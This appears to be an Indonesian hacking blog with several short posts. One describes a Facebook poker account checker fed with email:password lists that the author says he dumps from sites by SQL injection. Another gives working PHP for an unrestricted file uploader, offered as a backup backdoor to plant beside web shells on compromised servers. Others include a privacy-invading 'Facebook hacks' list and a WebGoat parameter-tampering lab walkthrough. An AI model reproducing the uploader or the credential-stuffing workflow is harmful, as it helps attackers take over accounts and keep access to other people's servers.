[PHP] Facebook TeXas Hold'Em Poker Check!

Jumat, 29 Juli 2011 - Diposting oleh bams-newbie di 09.49
This tool is used to check email:password list for zynga poker chips on facebook. Usually i get the emails:passwords list by dumping site database with sql injection. :ngakak:

And here are The Code :

  • CODE .

  • It would be funny as hell if you can get 1 Billion chips with this tool!!! :love: :ngakak:

    Enjoy and don't rip this tool and publish this to your blog/site, its MAHO characteristic anyway, No comment!!
    Don't ask me how to using it , ask to google .

    Thanks to:

    who has made this thread

    Cara ganti nama Facebook yang UDah maksimal

    Minggu, 17 Juli 2011 - Diposting oleh bams-newbie di 06.08
    Yoyoyo Selamat bertemu kembali dengan saya. Orang terkeren saat ini :)) langsung wae yo dab
    bagi kowe kowe semua yang pengen ganti nama Facebook kalian tapi udah kena batas maksimal gak usah bingung ne wa kasih triknya simak yo:

    1. Masuk account FB sampean
    2. Klik tautan iki ndi  -----> IKI LOW sing diklik 
    ntar kluar gambar seperti bawah

    Klik amankan account mengko dadine kayk gini

    selanjutnya klik lanjutkan aja trus sampe sini
    ya udah gitu aja,, selamat mencoba ya mas mbak bro salam crazy banditos


    Simple Uploader

    Minggu, 19 Juni 2011 - Diposting oleh bams-newbie di 19.58
    buat yg suka nanem shell ga ada salahnya nanem uploader juga buat jalan pintas cadangan
    1. <?php
    2. $action = $_POST["action"];
    3. $max_size = "1048576";

    4. echo "
    5. <b>Uploader</b><br>
    6. <form action='upload.php' method=post  enctype='multipart/form-data'>
    7. File (max size: $max_size bytes/".($max_size/1024)." kb):<br>
    8. <input type='file' name='filename'><br>
    9. <input type='hidden' name='action' value='upload'>
    10. <input type='submit' value='Upload File'>
    11. </form>";

    12. if ($action == 'upload')
    13. {
    16.     if ($_FILES["filename"]["size"] > $max_size) die ("<b>File too big!  Try again...</b>");
    19.     copy($_FILES["filename"]["tmp_name"],"./".$_FILES["filename"]["name"]) or die("<b>Unknown error!</b>");
    20.     echo "<b>File Uploaded.</b>";
    23. }
    25. ?> 
    Save dengan nama upload.php , dah taukan harus diupload dimana

    Kembangin ndiri bro 

    Thanks to: DNZ (codenesia.)

    Heck Cew

    Diposting oleh bams-newbie di 05.58
    CARA MENG - HaCK Cewe................bagi yang belum punya???khusus jomblo

    kalo kurang pas ato salah didelete aja om mimin n momod


    1. kumpulin info.

    tool : temen-temen target, Yellow pages, Google, FS,FB dsb..
    Grinusage : nama, alamat, ttl dll

    2. Scanning Target.

    tool : Teropong
    Usage : 30 meter dari target, scan bagian2 yg penting

    3. Coba masuk ke system hati dan injeksi dengan kata-kata manis yang meluluhkan hati

    tool : mulut, buku puisi,HP
    Usage : pandai2 aja cari bahan obrolan sekalian luluhkan Hatinya dengan Shell yang lo miliki

    4. Bikin backdoor

    tool : HP
    Usage : Rajin2 sms n telpon tiap sabtu biar gk ngabisin pulsa wkwkwwk

    5. Bikin akses Root

    Tool : dompet tebal, <<< uang receh atau kertas aja
    Usage : jgn pelit2 traktirnya << traktir di warung kopi aja gk usah di REsto

    6. Lock the target

    Tool : Mulut,Social Enginer (bagi yang gk PD)
    Usage : Say I Love U... + kekuranganmu supaya dia gk kecewa nantinya

    7. Alternative Ways

    Tool : CAin And Abel,Hacking Tools
    usage : Hack FB,FS atau apalah kalau di tolak

    klo langkah2 diatas pada gagal....coba yang dibawah ini

    Tool : Mulut
    Usage : banyak berdoa dan tawakal aja, anda belum berjodoh, jodoh ditangan Tuhan


    sumber : mmbah google

    Top 10 facebook Hacks

    Jumat, 04 Juni 2010 - Diposting oleh bams-newbie di 12.03
    Facebook has become very famous in last 2 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.

    1.How to View the Album of Any User Even if it is Private

    You can use this script to view a photo in the original album, even if you’re not friends with the person.
    2. How to Remove Annoying Facebook Advertisement

    Get rid of some of the Facebook advertising and sponsored by sections with this tool.
    3. How to see Real Profiles from Public Pages

    This script redirects to real profiles from the Facebook people pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.
    4. How to Undo Facebook Changes

    If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.
    5. How to View All the Photos from a Person

    You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.
    6. How to Find More Friends at Facebook

    Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this script and it will help you go through your friends’ friends list and find them out.
    7. How to Share Files from Facebook

    With this box widget, you can share files from your computer through Facebook. Isn’t it great?
    8. How to Get a Job from Facebook

    Looking for a job? This application gives Facebook users unique access to job information, networking opportunities and other career resources.
    9. How to Tighten up the Privacy and still Maintain Communication Convenience

    The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.
    10 How to Cheat Facebook Texas Hold em Poker

    This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free.

    How Hackers Manipulate the Live Data Stream on Internet

    Kamis, 03 Juni 2010 - Diposting oleh bams-newbie di 11.54

    1. First of all install WebGoat and configure Web browser
    2. We will use the tool Achilles. It is a tool designed for testing the security of Web applications. Achilles is a proxy server, which acts as a man-in-themiddle during an HTTP session. For more about Achilles, pls check its official website.
    3. Double-click the webgoat.exe icon from the directory containing the WebGoat application.

    4. Configure the LAN setting as shown in the below fig

    5. Run the Achilles application & select the options of the application as shown in below fig.

    Intercept mode ON
    Intercept Client Data
    Ignore .jpg/.gif
    Select Log to File - Save the data
    6. Your Achilles screen should look like the following.

    7. Open Internet Explorer and Adjust both screens equally on your desktop as shoen below.

    8. Click the Start button on Achilles and notice that the status bar along the lower-left side of Achilles will let you know it is running.
    9. In the address bar of Internet Explorer, enter the following address:

    10. Press Enter, and Achilles will list the data flowing through to the Tomcat application. Click the Send button in Achilles. You will be presented with a login screen. For the User Name and Password enter the word guest. click the Send button again.

    11. Click the Send button again & WebGoat screen will be displayed in the Web browser.
    12. Under the Unvalidated Parameters section, specifically the Hidden Field Tampering area. Click on this area.
    13. Click the Send button again.
    14. WebGoat will appear with a shopping cart as shown below.

    15. Click the Purchase button. Within Achilles you will see the QTY=1 & is Price=4999.99. Now if you want to make a purchase, whose actual cost is 4999.99 but you have only 1.99 in your account, Within Achilles edit the 4999.99 to 1.99 and then click the Send button.

    16. The sale has completed, with a total charge of $1.99.

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